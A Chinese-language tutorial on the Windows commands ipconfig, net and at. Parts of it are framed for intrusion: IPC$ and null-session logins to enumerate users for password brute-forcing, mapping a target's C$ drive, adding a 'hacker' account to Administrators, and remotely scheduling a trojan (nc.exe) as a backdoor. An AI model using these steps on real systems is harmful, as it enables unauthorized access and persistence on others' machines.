目录
一、ipconfig命令
二、net命令
三、at命令
一、ipconfig命令
ipconfig命令应该是最最基础的命令了,主要功能就是显示用户所在主机内部的IP协议的配置信息等资料。
它的主要参数有:
all:显示与TCP/IP协议相关的所有细节信息,其中包括测试的主机名、IP地址、子网掩码、节点类型、是否启用IP路由、网卡的物理地址、默认网关等。
renew all:更新全部适配器的通信配置情况,所有测试重新开始。
release all:释放全部适配器的通信配置情况。
renew n:更新第n号适配器的通信配置情况,所有测试重新开始。
【示例】
C:\>ipconfig
Windows IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.14
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
二、Net命令
Net命令主要是在windows NT平台中完成一些网络工作,它的功能非常强大,可以这么说如果你想学习windows平台下的网络安全,必须熟悉使用该命令。该命令的语法很多,功能强大,我们只是介绍一些简单常用的。
1、建立IPC连接
只要你拥有某IP的用户名和密码,那就用IPC$做连接,这里我们假如你得到的用户是管理员administrator,密码是123456。假设对方IP为192.168.0.1
net use \\192.168.0.1\ipc$ "123456"/user:"administrator"
一般会显示如下信息:
C:\>net use \\192.168.0.1\ipc$ "123456"/user:"administrator"
命令成功完成。
退出的命令是:net use \\192.168.0.1\ipc$ /del
一般执行后会显示如下信息:
C:\>net use \\192.168.0.1\ipc$ /del
\\192.168.0.1\ipc$ 已经删除。
当然你也可以建立一个空的IPC连接,也就是我们常说的空连接,也就是不需要用户名和密码的IPC连接,一般建立这类连接后就可以获取对方的很多系统信息,比如用户名,共享资源等。建立空连接和建立IPC连接是一样的,不过是不需要用户名和密码,例如我们要建立和IP地址为192.168.0.39的机器的空连接,使用以下命令:
net use \\192.168.0.39\ipc$ ""/user""
如果提示成功就建立了和该IP地址的空连接,然后通过其它命令就可以获取一些该系统的信息,这些系统信息在入侵或者是网络维护中是起着非常重要的作用的,比如你获取了用户名,那么你就可以进行暴力破解密码等。
2、映射磁盘
如果和对方建立了IPC连接,那么就可以映射对方的磁盘。
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.
net use z:\\127.0.0.1\c$
执行命令后效果如下:
C:\>net use z: \\192.168.0.92\c$
命令成功完成。
如果这么映射磁盘后,我们就可以直接通过访问本地的Z盘来访问对反的C盘。
3.打开服务
如果想打开自己的一些服务,那么就可以使用net start命令,例如:
net start telnet
就可以打开Telnet服务了。
一般有如下信息显示:
C:\>net start telnet
Telnet 服务正在启动 .
Telnet 服务已经启动成功。
4.关闭服务:
关闭服务使用net stop命令,例如:
net stop tenet //就可以关闭Telnet服务啦
一般执行后,有如下信息:
C:\>net stop telnet
Telnet 服务正在停止.
Telnet 服务已成功停止。
C:\>
5、建立用户
必须有足够的权限,建立用户可以是本机,如果是对方的机器,必须远程登陆到对方系统,或者获得了一个shell后才能执行。(输入命令时要注意空格)
我们添加一个hacker的用户密码为lovehacker:
net user hacker lovehacker /add
只要显示命令成功,那么我们可以把他加入Administrator组(管理员组)了:
net localgroup Administrators hacker /add
6、激活用户/停止用户
Guest用户默认是打开的,但是有写管理员会把它停止,我们怎么把它从新激活呢?可以使用netuser命令:
net user guest /active:yes
如果我们想停止一个活动用户,比如停止Guest用户:
net user guest /active:no
7、显示网络资源共享状况
net view,可以显示网络资源共享状况,比如执行 net view \\IP地址,就可以查看该机器的资源共享状况,前提是必须建立了IPC连接,当然你可以建立一个空的IPC连接,也就是不需要用户名和密码的IPC连接。(上面的IPC连接有讲到,请仔细阅读)例如:
C:\>net view \\192.168.0.39
在 \\192.168.0.39 的共享资源
共享名 类型 使用为 注释
-------------------------------------------------------
ftproot Disk
webroot Disk
命令成功完成。
8、发送网络消息
使用net send命令可以给局域网/广域网发送一条消息,格式为:net send IP地址 “消息内容“,如:
net send 192.168.0.1 "这是netsend发送的消息!"
那么一回儿后192.168.0.1的机器将出现一个标题为“信使服务”的窗口,里面显示了你发送的消息,当然如果对方关闭了Messenger服务的话,这条消息是不会显示的,如果你不想收到该类消息,也可以在服务中把Messenger服务关闭。
三、At命令
1、本地AT命令
at命令是一个计划任务命令,和我们windows中的计划任务效果是一样的,但是它是通过命令的方式。
【示例】一般我们可以在本机上直接使用at命令来运行一些已经存在的程序,比如现在是19:58,我们想在20:00的时候运行cmd.exe打开
at 20:00 c:\winnt\system32\cmd.exe
那么就会显示“新加了一项作业,其作业 ID = 1",然后在执行"at"命令就可以看见以下信息:
状态 ID 日期 时间 命令行
-----------------------------------------------------------------------
1 今天 下午 20:00 cmd.exe
那么在20:00就会打开一的cmd的窗口。如果想取消计划任务的话,可以使用以下命令:
at ID号 /del,ID号就是上面显示的ID-->1,那么如果我们要取消ID为1的计划任务,就可以执行下面的命令:
at 1 /del
如果对该命令有不熟悉的的地方,可以使用at /?命令来查看它的帮助。
2、远程AT命令
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器,你首先要得到对方的时间,
net time \\127.0.0.1
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1:
at \\127.0.0.1 12:3 c:\winnt\system32nc.exe
后面的路径是要运行的程序在对方磁盘的目录,这个要搞清楚。
这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上。